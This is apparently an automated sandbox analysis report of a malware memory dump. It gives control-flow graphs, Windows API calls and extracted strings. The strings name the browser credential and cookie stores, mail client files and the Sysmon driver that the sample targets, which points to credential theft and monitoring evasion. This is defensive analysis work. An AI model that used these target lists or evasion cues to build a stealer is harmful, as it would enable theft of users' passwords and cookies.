                                                            control_flow_graph 5516 42b9c5-42b9ce 5517 42b9d5-42b9dd 5516->5517 5518 42ba34-42ba39 5517->5518 5519 42b9df-42b9e4 5517->5519 5522 42bb28-42bb2d 5518->5522 5523 42ba3f-42ba44 5518->5523 5520 42bad0-42bad5 5519->5520 5521 42b9ea-42b9ef 5519->5521 5528 42badb-42bae0 5520->5528 5529 42bbcf-42bbd4 5520->5529 5526 42b9f5-42b9fa 5521->5526 5527 42bb59-42bb5e 5521->5527 5524 42bb33-42bb38 5522->5524 5525 42bc20-42bc25 5522->5525 5530 42ba4a-42ba4f 5523->5530 5531 42bb9c-42bba1 5523->5531 5532 42bb3e-42bb43 5524->5532 5533 42bd0d-42bd12 5524->5533 5536 42bc2b-42bc30 5525->5536 5537 42bdff-42be04 5525->5537 5534 42ba00-42ba05 5526->5534 5535 42bc6c-42bc71 5526->5535 5538 42bd40-42bd45 5527->5538 5539 42bb64-42bb69 5527->5539 5540 42bae6-42baeb 5528->5540 5541 42bcdd-42bce2 5528->5541 5546 42bdba-42bdbf 5529->5546 5547 42bbda-42bbdf 5529->5547 5544 42ba55-42ba5a 5530->5544 5545 42bcab-42bcb0 5530->5545 5542 42bba7-42bbac 5531->5542 5543 42bd6e-42bd73 5531->5543 5560 42bed5-42bef9 5532->5560 5561 42bb49-42bb4e 5532->5561 5566 42bd18-42bd1d 5533->5566 5567 42bfed-42c009 5533->5567 5564 42be21-42be81 call 40e14e * 4 5534->5564 5565 42ba0b-42ba10 5534->5565 5554 42bf87-42bfa6 call 42ca0d 5535->5554 5555 42bc77-42bc7c 5535->5555 5550 42bc36-42bc3b 5536->5550 5551 42bf6c-42bf77 5536->5551 5552 42be0a-42be0f 5537->5552 5553 42c08d-42c0b0 5537->5553 5570 42bd4b-42bd50 5538->5570 5571 42c018-42c027 5538->5571 5568 42bf09-42bf29 5539->5568 5569 42bb6f-42bb74 5539->5569 5556 42baf1-42baf6 5540->5556 5557 42be9f-42bec5 call 42ad82 5540->5557 5562 42bfd2-42bfe8 5541->5562 5563 42bce8-42bced 5541->5563 5572 42bbb2-42bbb7 5542->5572 5573 42bf39-42bf5c 5542->5573 5574 42bd79-42bd7e 5543->5574 5575 42c02c-42c033 5543->5575 5576 42ba60-42ba65 5544->5576 5577 42be86-42be8f 5544->5577 5558 42bcb6-42bcbb 5545->5558 5559 42bfab-42bfcd call 42b9c5 5545->5559 5548 42bdc5-42bdca 5546->5548 5549 42c038-42c043 5546->5549 5578 42bbe5-42bbea 5547->5578 5579 42c05e-42c084 5547->5579 5548->5517 5600 42bdd0-42bdef call 42b9ae 5548->5600 5587 42c045-42c04d 5549->5587 5588 42c04f 5549->5588 5550->5517 5584 42bc41-42bc61 5550->5584 5580 42c010-42c013 5551->5580 5581 42bf7d-42bf82 5551->5581 5552->5517 5601 42be15-42be1c 5552->5601 5591 42c0b7-42c0ba 5553->5591 5592 42c0b2 5553->5592 5554->5517 5555->5517 5586 42bc82-42bca6 call 42b9c5 5555->5586 5556->5517 5602 42bafc-42bb11 call 40b7bb 5556->5602 5557->5580 5637 42becb-42bed0 5557->5637 5558->5517 5589 42bcc1-42bcd8 call 447e24 5558->5589 5559->5517 5560->5580 5608 42beff-42bf04 5560->5608 5561->5588 5604 42bb54 5561->5604 5562->5517 5563->5517 5593 42bcf3-42bd08 5563->5593 5564->5517 5594 42ba16-42ba32 call 438e28 5565->5594 5595 42c0bf-42c0c4 5565->5595 5566->5517 5596 42bd23-42bd3b 5566->5596 5567->5580 5585 42c00b 5567->5585 5568->5580 5610 42bf2f-42bf34 5568->5610 5569->5517 5607 42bb7a-42bb97 5569->5607 5570->5517 5597 42bd56-42bd69 5570->5597 5571->5517 5572->5517 5609 42bbbd-42bbca 5572->5609 5573->5580 5611 42bf62-42bf67 5573->5611 5574->5517 5598 42bd84-42bdaf call 42b9c5 5574->5598 5575->5517 5576->5517 5599 42ba6b-42bacb call 40e14e * 4 5576->5599 5577->5580 5605 42be95-42be9a 5577->5605 5578->5517 5612 42bbf0-42bc15 call 42ca0d 5578->5612 5590 42c086-42c08b 5579->5590 5579->5591 5580->5517 5581->5580 5584->5611 5616 42bc67 5584->5616 5585->5580 5586->5517 5587->5579 5587->5588 5618 42c050 5588->5618 5589->5517 5590->5591 5591->5517 5592->5591 5593->5517 5594->5517 5595->5517 5621 42c0ca-42c0d9 call 447a80 5595->5621 5596->5517 5597->5517 5598->5611 5640 42bdb5 5598->5640 5599->5517 5600->5580 5642 42bdf5-42bdfa 5600->5642 5601->5517 5646 42bb16-42bb23 5602->5646 5604->5517 5605->5580 5607->5517 5608->5580 5609->5517 5610->5580 5611->5580 5612->5610 5638 42bc1b 5612->5638 5616->5580 5618->5618 5637->5580 5638->5580 5640->5580 5642->5580 5646->5517
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *.CNM$*.PM$*.PMF$*.PML$*.PMN$*.USR$*.WPM$*CACHE.PM$C:\PMAIL$Ku^%$Ku^%$Mail Clients\Pegasus$kernel32.dll
                                                            • API String ID: 0-3904125897
                                                            • Opcode ID: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                            • Instruction ID: 84dac617f37148c4bf89ffca1ba6cb6ddcd73cd34940f6261eccf690c7d83b59
                                                            • Opcode Fuzzy Hash: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                            • Instruction Fuzzy Hash: E0E10BB1F0012A8BCF249E99A88167F7B74EB05354FA4052BE511EB361E77C8D409BDB

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 5655 40a928-40a970 call 447047 call 438e28 5661 40a973-40a97b 5655->5661 5662 40a9f5-40a9fa 5661->5662 5663 40a97d-40a982 5661->5663 5666 40aa00-40aa05 5662->5666 5667 40aa93-40aa98 5662->5667 5664 40aa43-40aa48 5663->5664 5665 40a988-40a98d 5663->5665 5668 40ab86-40ab8b 5664->5668 5669 40aa4e-40aa53 5664->5669 5670 40a993-40a998 5665->5670 5671 40aaee-40aaf3 5665->5671 5674 40aa0b-40aa10 5666->5674 5675 40ab4c-40ab51 5666->5675 5672 40abb7-40abbc 5667->5672 5673 40aa9e-40aaa3 5667->5673 5688 40ab91-40ab96 5668->5688 5689 40ad0b-40ad10 5668->5689 5680 40aa59-40aa5e 5669->5680 5681 40ac3b-40ac40 5669->5681 5682 40abfe-40ac03 5670->5682 5683 40a99e-40a9a3 5670->5683 5676 40aca4-40aca9 5671->5676 5677 40aaf9-40aafe 5671->5677 5678 40ad42-40ad47 5672->5678 5679 40abc2-40abc7 5672->5679 5686 40ac73-40ac78 5673->5686 5687 40aaa9-40aaae 5673->5687 5690 40ac20-40ac25 5674->5690 5691 40aa16-40aa1b 5674->5691 5684 40acd4-40acd9 5675->5684 5685 40ab57-40ab5c 5675->5685 5694 40b0b3-40b0ba 5676->5694 5695 40acaf-40acb4 5676->5695 5692 40aeb1-40aee5 5677->5692 5693 40ab04-40ab09 5677->5693 5706 40b0f1-40b101 5678->5706 5707 40ad4d-40ad52 5678->5707 5710 40afb5-40afd9 5679->5710 5711 40abcd-40abd2 5679->5711 5712 40aa64-40aa69 5680->5712 5713 40ae1a-40ae25 5680->5713 5720 40b055-40b075 5681->5720 5721 40ac46-40ac4b 5681->5721 5714 40b010-40b029 call 447047 5682->5714 5715 40ac09-40ac0e 5682->5715 5696 40ad73-40ad84 5683->5696 5697 40a9a9-40a9ae 5683->5697 5698 40ae4c-40ae4f 5684->5698 5699 40acdf-40ace4 5684->5699 5700 40ab62-40ab67 5685->5700 5701 40af0a-40af24 5685->5701 5722 40b084-40b0ae call 438e28 5686->5722 5723 40ac7e-40ac83 5686->5723 5718 40ae90-40aea2 call 40a928 5687->5718 5719 40aab4-40aab9 5687->5719 5704 40ab9c-40aba1 5688->5704 5705 40af4e-40af66 5688->5705 5702 40ad16-40ad1b 5689->5702 5703 40b0bf-40b0e2 5689->5703 5716 40ac2b-40ac30 5690->5716 5717 40b02e-40b050 lstrcatW lstrlenW 5690->5717 5708 40aa21-40aa26 5691->5708 5709 40adcf-40ae09 call 40b81c call 40a928 5691->5709 5731 40b0e9-40b0ec 5692->5731 5732 40aeeb-40aef0 5692->5732 5724 40aef5-40af05 5693->5724 5725 40ab0f-40ab14 5693->5725 5694->5661 5695->5661 5746 40acba-40accf lstrcatW 5695->5746 5758 40b009-40b00e 5696->5758 5759 40ad8a 5696->5759 5749 40a9b4-40a9b9 5697->5749 5750 40ad8f-40adbf call 40b129 call 40b7bb 5697->5750 5727 40ae50 5698->5727 5699->5661 5751 40acea-40acfb 5699->5751 5728 40af33-40af49 call 447047 5700->5728 5729 40ab6d-40ab72 5700->5729 5735 40af26 5701->5735 5736 40af2b-40af2e 5701->5736 5702->5661 5753 40ad21-40ad32 5702->5753 5703->5731 5754 40b0e4 5703->5754 5733 40aba7-40abac 5704->5733 5734 40af6b-40af9c NtCreateFile call 438e28 5704->5734 5705->5661 5706->5661 5707->5661 5755 40ad58-40ad6e call 447047 5707->5755 5756 40aa2c-40aa31 5708->5756 5757 40ae0e-40ae15 5708->5757 5709->5661 5710->5661 5737 40abd8-40abdd 5711->5737 5738 40afde-40b007 call 40a928 call 40b129 5711->5738 5760 40ae6d-40ae8b 5712->5760 5761 40aa6f-40aa74 5712->5761 5713->5698 5726 40ae27-40ae2f 5713->5726 5714->5661 5739 40ac14-40ac1b 5715->5739 5740 40b106-40b10b 5715->5740 5741 40ae61-40ae68 5716->5741 5742 40ac36 5716->5742 5717->5661 5763 40aea5-40aeac 5718->5763 5719->5763 5764 40aabf-40aac4 5719->5764 5747 40b077 5720->5747 5748 40b07c-40b07f 5720->5748 5721->5661 5743 40ac51-40ac6e lstrlenW 5721->5743 5722->5661 5723->5661 5744 40ac89-40ac9f call 447047 5723->5744 5724->5661 5725->5661 5765 40ab1a-40ab3c 5725->5765 5726->5741 5766 40ae31-40ae47 5726->5766 5727->5727 5728->5661 5729->5661 5767 40ab78-40ab81 5729->5767 5731->5661 5732->5731 5733->5766 5769 40abb2 5733->5769 5790 40afa1-40afb0 5734->5790 5735->5736 5736->5748 5737->5661 5771 40abe3-40abee 5737->5771 5738->5748 5738->5758 5739->5661 5740->5661 5782 40b111-40b118 5740->5782 5741->5661 5742->5661 5743->5661 5744->5661 5746->5661 5747->5748 5748->5661 5749->5661 5776 40a9bb-40a9e5 5749->5776 5750->5748 5807 40adc5-40adca 5750->5807 5751->5748 5777 40ad01-40ad06 5751->5777 5753->5748 5779 40ad38-40ad3d 5753->5779 5754->5731 5755->5661 5756->5661 5781 40aa37-40aa3e 5756->5781 5757->5661 5758->5748 5759->5748 5760->5661 5761->5661 5784 40aa7a-40aa8e 5761->5784 5763->5661 5764->5661 5786 40aaca-40aade 5764->5786 5765->5748 5787 40ab42-40ab47 5765->5787 5766->5661 5767->5763 5769->5661 5771->5748 5789 40abf4-40abf9 5771->5789 5776->5748 5793 40a9eb-40a9f0 5776->5793 5777->5748 5779->5748 5781->5661 5795 40b11a-40b11c 5782->5795 5796 40b11e 5782->5796 5784->5661 5786->5748 5799 40aae4-40aae9 5786->5799 5787->5748 5789->5748 5790->5661 5793->5748 5801 40b121-40b128 5795->5801 5796->5801 5799->5748 5807->5748
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,774D0880,?,0040B7CA,0040C9F4,?,?,?), ref: 0040AC5E
                                                            • lstrcatW.KERNEL32(?,\??\,?,?,?,?,?,?,?,?,774D0880,?,0040B7CA,0040C9F4,?,?), ref: 0040ACC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcatlstrlen
                                                            • String ID: \??\$kernel32.dll$ntdll.dll
                                                            • API String ID: 1475610065-320376045
                                                            • Opcode ID: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                            • Instruction ID: cf05d70ef52a95d5e776fd44e962e356ae6502797ff445894325f4a97f5a2809
                                                            • Opcode Fuzzy Hash: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                            • Instruction Fuzzy Hash: E302C5B1E443198ADF288A58C842ABFB670EB14310F25493BE515FB3E0D3798D519B9F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 5960 42fd35-42fd3e 5961 42fd45-42fd4d 5960->5961 5962 42fdb5-42fdba 5961->5962 5963 42fd4f-42fd54 5961->5963 5964 42fe70-42fe75 5962->5964 5965 42fdc0-42fdc5 5962->5965 5966 42fe25-42fe2a 5963->5966 5967 42fd5a-42fd5f 5963->5967 5968 42ff83-42ff88 5964->5968 5969 42fe7b-42fe80 5964->5969 5970 42ff0a-42ff0f 5965->5970 5971 42fdcb-42fdd0 5965->5971 5974 42ff30-42ff35 5966->5974 5975 42fe30-42fe35 5966->5975 5972 42fec5-42feca 5967->5972 5973 42fd65-42fd6a 5967->5973 5982 4301bf-4301d6 5968->5982 5983 42ff8e-42ff93 5968->5983 5976 42fe86-42fe8b 5969->5976 5977 430095-4300a0 5969->5977 5990 430130-43016d call 42fd35 call 430228 5970->5990 5991 42ff15-42ff1a 5970->5991 5980 42fdd6-42fddb 5971->5980 5981 430004-43002c call 42f278 5971->5981 5984 42fed0-42fed5 5972->5984 5985 4300e4-4300ef 5972->5985 5986 42fd70-42fd75 5973->5986 5987 42ffcc-42ffd3 5973->5987 5978 430195-4301b6 5974->5978 5979 42ff3b-42ff40 5974->5979 5988 430051-430075 call 42f278 5975->5988 5989 42fe3b-42fe40 5975->5989 5993 4300b0-4300d4 5976->5993 5994 42fe91-42fe96 5976->5994 5998 4300a6-4300ab 5977->5998 5999 4301dd-4301e0 5977->5999 5978->5999 6012 4301b8-4301bd 5978->6012 6006 42ff46-42ff78 call 42f278 5979->6006 6007 4301e5-4301ea 5979->6007 6009 42fde1-42fde6 5980->6009 6010 430037-43004c 5980->6010 6028 43018e-430193 5981->6028 6033 430032 5981->6033 5982->5999 6015 4301d8 5982->6015 5983->5961 6011 42ff99-42ffbc 5983->6011 5996 43010a-43012b 5984->5996 5997 42fedb-42fee0 5984->5997 6002 4300f1-4300f9 5985->6002 6003 4300fb 5985->6003 6000 42fd7b-42fd80 5986->6000 6001 42ffd8-42fff9 call 42f278 5986->6001 5987->5961 5988->5961 6013 42fe46-42fe4b 5989->6013 6014 43007a-430090 5989->6014 5990->5999 6043 43016f-430174 5990->6043 6004 42ff20-42ff25 5991->6004 6005 430176-43018c 5991->6005 5993->5999 6021 4300da-4300df 5993->6021 5994->5961 6018 42fe9c-42fec0 call 42fd35 5994->6018 5996->5961 5997->5961 6020 42fee6-42ff05 call 42f278 5997->6020 5998->5999 5999->5961 6000->5961 6022 42fd82-42fd9e call 42f625 * 2 6000->6022 6001->6043 6044 42ffff 6001->6044 6002->5996 6002->6003 6023 4300fc 6003->6023 6004->6003 6024 42ff2b 6004->6024 6005->5999 6005->6028 6006->5998 6050 42ff7e 6006->6050 6007->5961 6016 4301f0-43021b call 42f625 * 3 6007->6016 6009->5961 6027 42fdec-42fe16 6009->6027 6010->5961 6011->5999 6029 42ffc2-42ffc7 6011->6029 6012->5999 6013->5961 6031 42fe51-42fe5c call 42f625 6013->6031 6014->5961 6015->5999 6057 430220-430227 6016->6057 6018->5961 6020->5961 6021->5999 6055 42fda3-42fdb3 6022->6055 6023->6023 6024->5961 6039 42fe18 6027->6039 6040 42fe1d-42fe20 6027->6040 6028->5999 6029->5999 6045 42fe61-42fe6b 6031->6045 6033->5999 6039->6040 6040->5961 6043->5999 6044->5999 6045->5961 6050->5999 6055->5961
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$cert9.db$cookies.sqlite$formhistory.sqlite$key4.db$logins.json$places.sqlite
                                                            • API String ID: 4038537762-2469458786
                                                            • Opcode ID: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                            • Instruction ID: d1eb3a7c9248dbe3af820f863548cf4fb9ed3ca77677979f9304c8b24649e330
                                                            • Opcode Fuzzy Hash: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                            • Instruction Fuzzy Hash: 9FB128B1E1012A97CF288E58A95567F7674AB45300FE4163BE816FB390E73DCA05878B

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6193 4262a1-4262b8 6194 4262bc-4262c4 6193->6194 6195 4262c6-4262cb 6194->6195 6196 426335-42633a 6194->6196 6199 4262d1-4262d6 6195->6199 6200 42638a-42638f 6195->6200 6197 426340-426345 6196->6197 6198 4263f4-4263f9 6196->6198 6203 4264a5-4264aa 6197->6203 6204 42634b-426350 6197->6204 6201 426529-42652e 6198->6201 6202 4263ff-426404 6198->6202 6205 426448-42644d 6199->6205 6206 4262dc-4262e1 6199->6206 6207 4264e3-4264e8 6200->6207 6208 426395-42639a 6200->6208 6209 426534-426539 6201->6209 6210 4266ed-4266f2 6201->6210 6211 426616-42661b 6202->6211 6212 42640a-42640f 6202->6212 6213 4264b0-4264b5 6203->6213 6214 426675-42667a 6203->6214 6215 426356-42635b 6204->6215 6216 4265a4-4265a9 6204->6216 6221 426453-426458 6205->6221 6222 426648-42664d 6205->6222 6217 426582-426587 6206->6217 6218 4262e7-4262ec 6206->6218 6219 4266bb-4266c0 6207->6219 6220 4264ee-4264f3 6207->6220 6223 4263a0-4263a5 6208->6223 6224 4265ea-4265ef 6208->6224 6227 4268c6-4268de 6209->6227 6228 42653f-426544 6209->6228 6233 4266f8-4266fd 6210->6233 6234 4269ae-4269cc call 4279e0 6210->6234 6245 426621-426626 6211->6245 6246 426914-426939 6211->6246 6231 4267d4-4267f3 call 422817 6212->6231 6232 426415-42641a 6212->6232 6247 426847-426862 RtlAdjustPrivilege call 4279e0 6213->6247 6248 4264bb-4264c0 6213->6248 6253 426680-426685 6214->6253 6254 42695e-42696d 6214->6254 6249 426361-426366 6215->6249 6250 4265de-4265e5 6215->6250 6237 4265af-4265b4 6216->6237 6238 4268fc-426903 6216->6238 6235 4268e3-4268f7 6217->6235 6236 42658d-426592 6217->6236 6239 4262f2-4262f7 6218->6239 6240 42670f-426719 6218->6240 6229 426972-42699f call 424c44 call 422177 6219->6229 6230 4266c6-4266cb 6219->6230 6255 4268a4-4268ab 6220->6255 6256 4264f9-4264fe 6220->6256 6241 426824-426836 6221->6241 6242 42645e-426463 6221->6242 6251 426942-426959 6222->6251 6252 426653-426658 6222->6252 6225 42676a-426791 6223->6225 6226 4263ab-4263b0 6223->6226 6243 4265f5-4265fa 6224->6243 6244 426908-42690f 6224->6244 6259 4269a6-4269a9 6225->6259 6280 426797-42679c 6225->6280 6273 4267a1-4267c4 6226->6273 6274 4263b6-4263bb 6226->6274 6227->6194 6257 4269d1-4269d6 6228->6257 6258 42654a-426572 call 424995 6228->6258 6229->6259 6325 4269a1 6229->6325 6230->6194 6275 4266d1-4266e8 6230->6275 6231->6259 6315 4267f9-4267fe 6231->6315 6276 426803-42681f 6232->6276 6277 426420-426425 6232->6277 6233->6194 6278 426703-42670a 6233->6278 6234->6194 6235->6194 6236->6194 6262 426598-42659f 6236->6262 6237->6194 6263 4265ba-4265d9 call 426a09 6237->6263 6238->6194 6264 426729-42673a 6239->6264 6265 4262fd-426302 6239->6265 6240->6259 6279 42671f-426724 6240->6279 6241->6194 6281 42683b-426842 6242->6281 6282 426469-42646e 6242->6282 6243->6194 6267 426600-426611 GetPEB 6243->6267 6244->6194 6245->6194 6268 42662c-426643 call 43f000 6245->6268 6246->6259 6260 42693b-426940 6246->6260 6306 426867-426872 6247->6306 6284 4264c6-4264cb 6248->6284 6285 426877-426894 6248->6285 6269 42673f-42675a 6249->6269 6270 42636c-426371 6249->6270 6250->6194 6251->6194 6252->6194 6271 42665e-426670 6252->6271 6253->6194 6272 42668b-4266ab call 426a42 call 41eba8 6253->6272 6254->6194 6255->6194 6287 4268b0-4268c1 6256->6287 6288 426504-426509 6256->6288 6257->6194 6295 4269dc-4269e3 6257->6295 6258->6259 6317 426578-42657d 6258->6317 6259->6194 6260->6259 6262->6194 6263->6250 6264->6194 6265->6194 6293 426304-42632a call 422817 call 4244e4 6265->6293 6267->6194 6268->6194 6269->6259 6301 426760-426765 6269->6301 6270->6194 6297 426377-42637b 6270->6297 6271->6194 6272->6259 6331 4266b1-4266b6 6272->6331 6273->6259 6302 4267ca-4267cf 6273->6302 6274->6194 6299 4263c1-4263ef LoadLibraryA 6274->6299 6275->6194 6276->6194 6277->6194 6300 42642b-426443 call 41eba8 call 41f9a4 6277->6300 6278->6194 6279->6259 6280->6259 6281->6194 6282->6194 6303 426474-426495 call 41eb3f 6282->6303 6284->6194 6305 4264d1-4264de call 422817 6284->6305 6285->6259 6307 42689a-42689f 6285->6307 6287->6194 6288->6194 6289 42650f-426524 6288->6289 6289->6194 6293->6307 6333 426330 6293->6333 6320 42637e-426385 6297->6320 6299->6194 6300->6262 6301->6259 6302->6259 6303->6259 6329 42649b-4264a0 6303->6329 6305->6278 6306->6194 6307->6259 6315->6259 6317->6259 6320->6194 6325->6259 6329->6259 6331->6259 6333->6259
                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: A8r$SysmonDrv$dll$fltl$ib.d
                                                            • API String ID: 1029625771-1616023887
                                                            • Opcode ID: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                            • Instruction ID: eb42a9731a47ced65949ee17454b9c50096d91694aa44b165600d0182d074a5f
                                                            • Opcode Fuzzy Hash: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                            • Instruction Fuzzy Hash: E7E1D5B1709220DBCB24AB18E68572E76E5EB80304FA65D1FF485CB350D63DC9829B5B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M0@$UL6T$VL6T
                                                            • API String ID: 0-769956738
                                                            • Opcode ID: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                            • Instruction ID: 5b652a97159c1cfdc4854cd4c98ad9d0b798284c57e6c6df073e9b00d242a01e
                                                            • Opcode Fuzzy Hash: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                            • Instruction Fuzzy Hash: 0032A871D1051B8BCF289A98878D57EB6B0AB54350B24063BE915FB3D0D3BCCE419B9B

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6767 40b129-40b139 6768 40b13c-40b144 6767->6768 6769 40b146-40b14b 6768->6769 6770 40b17e-40b183 6768->6770 6773 40b1b7-40b1bc 6769->6773 6774 40b14d-40b152 6769->6774 6771 40b215-40b21a 6770->6771 6772 40b189-40b18e 6770->6772 6781 40b220-40b225 6771->6781 6782 40b359-40b35e 6771->6782 6775 40b194-40b199 6772->6775 6776 40b2db-40b2e0 6772->6776 6777 40b1c2-40b1c7 6773->6777 6778 40b32c-40b331 6773->6778 6779 40b2a5-40b2aa 6774->6779 6780 40b158-40b15d 6774->6780 6785 40b40f-40b414 6775->6785 6786 40b19f-40b1a4 6775->6786 6797 40b601-40b607 call 40a928 6776->6797 6798 40b2e6-40b2eb 6776->6798 6789 40b4c7-40b4cc 6777->6789 6790 40b1cd-40b1d2 6777->6790 6787 40b646-40b65b 6778->6787 6788 40b337-40b33c 6778->6788 6793 40b2b0-40b2b5 6779->6793 6794 40b584-40b5a7 call 40a928 6779->6794 6795 40b163-40b168 6780->6795 6796 40b3c8-40b3cd 6780->6796 6783 40b4a9-40b4c2 6781->6783 6784 40b22b-40b230 6781->6784 6791 40b360-40b365 6782->6791 6792 40b395-40b3b8 6782->6792 6783->6768 6799 40b236-40b23b 6784->6799 6800 40b569-40b574 6784->6800 6801 40b710-40b73f call 40b129 6785->6801 6802 40b41a-40b41f 6785->6802 6814 40b541-40b55e 6786->6814 6815 40b1aa-40b1af 6786->6815 6804 40b661-40b666 6787->6804 6805 40b746-40b749 6787->6805 6816 40b342-40b347 6788->6816 6817 40b66b-40b6a6 call 40b81c call 40a928 6788->6817 6812 40b4d2-40b4f3 6789->6812 6813 40b74e-40b753 6789->6813 6818 40b494-40b497 6790->6818 6819 40b1d8-40b1dd 6790->6819 6820 40b6ab-40b6ca 6791->6820 6821 40b36b-40b370 6791->6821 6792->6805 6823 40b3be-40b3c3 6792->6823 6806 40b5b2-40b5f1 call 40b81c call 40b7bb 6793->6806 6807 40b2bb-40b2c0 6793->6807 6794->6804 6865 40b5ad 6794->6865 6808 40b503-40b532 6795->6808 6809 40b16e-40b173 6795->6809 6824 40b6d3-40b6fc 6796->6824 6825 40b3d3-40b3d8 6796->6825 6827 40b60c-40b616 6797->6827 6810 40b2f1-40b2f6 6798->6810 6811 40b61b-40b641 call 438e28 6798->6811 6799->6768 6826 40b241-40b295 call 40b129 call 40b81c 6799->6826 6800->6805 6850 40b57a-40b57f 6800->6850 6801->6805 6848 40b741 6801->6848 6802->6768 6840 40b425-40b470 call 438e28 call 447e24 6802->6840 6804->6805 6805->6768 6806->6805 6880 40b5f7-40b5fc 6806->6880 6807->6768 6829 40b2c6-40b2cc 6807->6829 6844 40b534 6808->6844 6845 40b539-40b53c 6808->6845 6809->6768 6842 40b175-40b17c 6809->6842 6810->6768 6831 40b2fc-40b321 6810->6831 6811->6768 6812->6805 6843 40b4f9-40b4fe 6812->6843 6813->6768 6838 40b759-40b7ba NtReadFile call 438e28 NtClose 6813->6838 6814->6848 6849 40b564 6814->6849 6846 40b1b5 6815->6846 6847 40b2cf-40b2d6 6815->6847 6816->6768 6835 40b34d-40b354 6816->6835 6817->6768 6841 40b498 6818->6841 6819->6768 6851 40b1e3-40b210 call 447047 call 447e24 6819->6851 6820->6805 6832 40b6cc-40b6d1 6820->6832 6821->6768 6837 40b376-40b381 6821->6837 6823->6805 6833 40b703-40b70b call 40b81c 6824->6833 6834 40b6fe 6824->6834 6825->6768 6839 40b3de-40b404 call 40b129 6825->6839 6826->6805 6884 40b29b-40b2a0 6826->6884 6827->6768 6829->6847 6831->6804 6857 40b327 6831->6857 6832->6805 6833->6768 6834->6833 6835->6768 6837->6818 6860 40b387-40b38f 6837->6860 6839->6848 6878 40b40a 6839->6878 6886 40b475-40b48f 6840->6886 6841->6841 6842->6768 6843->6805 6844->6845 6845->6768 6846->6768 6847->6768 6848->6805 6849->6805 6850->6805 6851->6768 6857->6805 6860->6783 6860->6792 6865->6805 6878->6805 6880->6805 6884->6805 6886->6768
                                                            APIs
                                                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,7750F770,7750F770), ref: 0040B792
                                                            • NtClose.NTDLL ref: 0040B7B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFileRead
                                                            • String ID: LK$Y[$ntdll.dll
                                                            • API String ID: 752142053-4222218168
                                                            • Opcode ID: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                            • Instruction ID: 4487220ceab9a8d4c25bfe658470c8f7c93894071a863f051833b6fbd766e42f
                                                            • Opcode Fuzzy Hash: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                            • Instruction Fuzzy Hash: C0E1BDB29043058BDB249F69C59516EBAE1EB85314F25893FE485FB3D0E33C89418B9F
                                                            APIs
                                                              • Part of subcall function 0041F916: VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984
                                                            • NtQueryInformationProcess.NTDLL(000000FF,0000001E,?,00000004,00000000), ref: 004223A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
